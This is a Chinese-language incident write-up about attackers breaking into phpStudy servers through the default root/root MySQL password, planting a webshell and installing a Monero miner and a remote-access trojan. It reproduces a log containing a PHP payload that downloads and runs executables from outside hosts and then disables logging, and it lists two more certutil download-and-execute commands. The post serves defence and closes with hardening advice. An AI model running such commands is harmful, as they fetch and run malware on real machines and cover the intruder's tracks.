針對phpStudy網站服務器的入侵

今天客戶服務器上出現報警，查找了下緣由，發現根目錄下有wk.php

E:\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
         2173 Quit    
190207 18:31:59     2174 Connect    root@localhost on 
         2174 Query    SET NAMES 'utf8' COLLATE 'utf8_general_ci'
         2174 Init DB    mysql
         2174 Init DB    mysql
         2174 Query    SELECT '<?php @system("certutil.exe -urlcache -split -f http://m4.rui2.net/upload/12/2016/10/wk.exe");@phpinfo();@system("certutil.exe -urlcache -split -f http://14.29.194.121:22/server_sql.php");@sleep(2);@system('wk.exe');?>'
         2174 Query    SHOW VARIABLES LIKE 'language'
         2174 Quit    
190207 18:32:00     2175 Connect    root@localhost on 
         2175 Query    SET NAMES 'utf8' COLLATE 'utf8_general_ci'
         2175 Init DB    mysql
         2175 Init DB    mysql
         2175 Query    set global general_log='off'

查了下緣由，是針對phpStudy網站服務器進行批量入侵的挖礦木馬

攻擊者對互聯網上的服務器進行批量掃描，發現易受攻擊的phpStudy系統後，利用用戶在安裝時未進行修改的MySQL弱密碼進行登陸，並進一步植入WebShell，而後經過shell下載挖礦木馬挖門羅幣。

 

 中招主機經過phpStudy一鍵部署PHP環境，默認狀況下包含phpinfo及phpMyAdmin而且任何人均可以訪問，同時安裝的MySQL默認口令爲弱口令密碼root/root，且開啓在外網3306端口，在未設置安全組或者安全組爲放通全端口的狀況下，受到攻擊者對於phpStudy的針對性探測，而且暴露了其MySQL弱口令。

特色：

　　（1）都是經過探測phpStudy搭建的php環境進行攻擊

　　（2）經過webshell植入挖礦木馬時，白利用certutil.exe

命令1

certutil.exe -urlcache -split -f http://down.ctosus.ru/wkinstall.exe &wkinstall.exe &del wkinstall.exe

命令2

certutil.exe  -urlcache  -split  -f  http://m4.rui2.net/upload/12/2016/10/wk.exe  &wk.exe

　　（3）挖礦木馬經過bat腳本啓動，且礦機採用xmr-stak挖礦工具

　　（4）在挖礦的同時植入大灰狼遠控木馬

安全建議：

　　（1）修復系統漏洞

　　（2）集成環境，在安裝結束後應及時修改MySQL密碼爲強密碼，最低密碼長度不要低於11位，組合最好是字母數字和符號；刪除l.php（探針文件），避免被黑客探測入侵

　　（3）增長安全策略

參考：https://s.tencent.com/research/report/642.html